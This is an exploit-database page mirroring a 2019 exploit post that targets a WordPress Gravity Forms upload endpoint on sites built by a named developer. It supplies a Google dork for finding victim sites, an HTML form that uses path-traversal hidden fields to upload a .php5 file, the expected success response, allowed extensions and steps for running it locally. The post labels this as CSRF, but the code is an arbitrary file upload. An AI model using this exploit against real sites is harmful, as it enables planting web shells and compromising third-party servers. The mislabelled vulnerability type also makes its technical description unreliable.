Advertisement






WordPress 4.6.1 Roberto Antonacci Cross Site Request Forgery

CVE Category Price Severity
CVE-2016-9263 CWE-352 Not specified High
Author Risk Exploitation Type Date
Roberto Antonacci High Remote 2019-05-22
CPE
cpe:cpe:/a:wordpress:wordpress:4.6.1
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050238

Below is a copy:

WordPress 4.6.1 Roberto Antonacci Cross Site Request Forgery
####################################################################

# Exploit Title : WordPress 4.6.1 Roberto Antonacci Cross Site Request Forgery
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 22/05/2019
# Vendor Homepage : robertoantonacci.com - gravityforms.com
# Software Affected Versions : 4.x - 4.6.1
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Sviluppato da Roberto Antonacci, siti web bari
# Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
WordPress Roberto Antonacci is vulnerable to cross-site request forgery, caused by
improper validation of user-supplied input. By persuading an authenticated user to visit 
a malicious Web site, a remote attacker could send a malformed HTTP request to 
perform unauthorized actions. An attacker could exploit this vulnerability to perform 
cross-site scripting attacks, Web cache poisoning, and other malicious activities.

The web application does not, or can not, sufficiently verify whether a well-formed, 
valid, consistent request was intentionally provided by the user who submitted the request.
When a web server is designed to receive a request from a client without any mechanism 
for verifying that it was intentionally sent, then it might be possible for an attacker to trick a 
client into making an unintentional request to the web server which will be treated as an 
authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and 
can result in exposure of data or unintended code execution.

####################################################################

# CSRF Cross Site Request Forgery Exploit :
****************************************
<title>WordPress 4.6.1 Roberto Antonacci  Input Exploiter</title>

<form action="http://[VULNERABLEWEBSITE]/?gf_page=upload" method="post" enctype="multipart/form-data">

<body background=" ">

<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type=hidden">
<input name="name" value="kingskrupellos.html" type=''hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">

</form>

# Directory File Path :
***********************
 /_input__kingskrupellos.php5

/_input__[YOURFILENAME].php5

# Vulnerability Error : 
******************* 
{"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}

# Vulnerability Error [ Successful ] : 
******************************* 
{"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}

# Allowed File Extensions :
*************************  
.html  .htm .php5 .php2 .txt  .jpg .gif .png .html.fla  .phtml .pdf 

# Example Usage for Windows :
****************************** 
# Use with XAMPP Control Panel and your Localhost.
# Use from htdocs folder located in XAMPP 

# 127.0.0.1/wordpressrobertoantonacciexploiter.html

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum